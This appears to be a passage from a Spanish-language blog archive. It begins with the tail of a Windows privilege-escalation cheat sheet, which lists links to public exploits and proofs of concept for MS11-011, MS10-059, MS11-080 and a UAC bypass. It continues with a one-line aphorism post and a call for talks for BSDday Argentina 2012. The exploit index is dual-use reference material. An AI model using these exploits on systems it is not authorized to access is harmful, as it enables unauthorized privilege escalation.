16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554

Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only

Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/

UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info

Referencias adicionales, fuentes y otros enlaces:
Encyclopaedia of Windows Privilege escalation - Brett Moor
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/


Tomado de: http://www.hackplayers.com/2012/08/cheatsheetescaladoprivilegioswindows.html

06 octubre 2012

La pregunta más importante


¿Cuál es la pregunta más importante?
Ésa.

Tomado de: http://homominimus.com/2010/10/29/la-pregunta-mas-importante/

Llamado a Charlas BSDday Argentina 2012


17 de Noviembre, Ciudad Autónoma de Buenos Aires.

Usuarios de OpenBSD Argentina (OpenBSDeros), Grupo de Usuarios de BSD
(Departamento de Computación FCEN, UBA) y Usuarios de Software Libre Argentina (USLA) llaman a la comunidad de software libre, usuarios, administradores, desarrolladores y aficionados de sistemas y tecnologías *BSD a participar del BSDday 2012.

La temática del evento esta orientada a Sistemas Operativo, Software en general, Licencias y Filosofía BSD, entre otros temas relacionados.

No existe una cantidad máxima de oradores por charla, pero se debe informar en la misma y mantener un criterio coherente, como tampoco un tiempo mínimo o máximo de duración.

Se alientan a que las charlas posean contenido del tipo demostrativo o interactivo, de forma de lograr una comunicación mas amena con el auditorio
haciendo uso de la/s temática/s de la misma.

Agradecemos la contribución de todos en la difusión de este llamado y del evento en si, reenviando este correo electrónico.


=== Hasta cuando se pueden enviar Charlas? ===
Se recibirán propuestas de charlas hasta el día 31 de Octubre inclusive.


=== Donde enviar las Charlas? ===
Las propuestas deben ser enviadas por medio de correo electrónico en formato estándar. En el caso de poseer la diapositiva adjuntar la misma (en algún formato libre), a la siguiente dirección de correo electrónico cfc [en] bsdday.org.ar


=== Como enviar las Charlas? ===
El envió de la propuesta de charla debe tener los siguientes datos:

Titulo
Autor(es): Nombre y apellido, breve descripción de cada uno, lugar de residencia, asociación, BUG u organismo si corresponde.
Tiempo estimado de duración
Breve descripción de la charla: Uno o dos párrafo(s) que explique -no tan brevemente- el contenido de la presentación.
Nivel de la Charla:  Iniciante/Intermedio/Avanzado/Experto.
Conocimientos previos mínimos requeridos por los asistentes.
Temática: Puede ser: programación, multimedia, comunicaciones, estación de trabajo, servicios de red, interoperabilidad, educación, kernel.


=== Que formato deben tener las Presentaciones? ===
El envió de las diapositivas y/o presentaciones debe tener alguno de los siguientes formatos:

OpenDocument presentation
HTML standard
Postscript
PDF
Texto plano
LaTex/Beamer
Rst


=== Licencia ===
Debe especificarse una licencia que permita que los organizadores del evento distribuyan el material y que permita ser descargado del sitio web del BSDday.

Se alienta a una licencia del tipo CC-BY-SA 3.0 Ported (Argentina) o similar.


Importante: Por cuestiones presupuestarias, este anio no podremos
garantizar el abono de los pasajes y hospedajes de los disertantes seleccionados que residan fuera de Ciudad Autónoma de Buenos Aires o del Gran Buenos Aires (Argentina).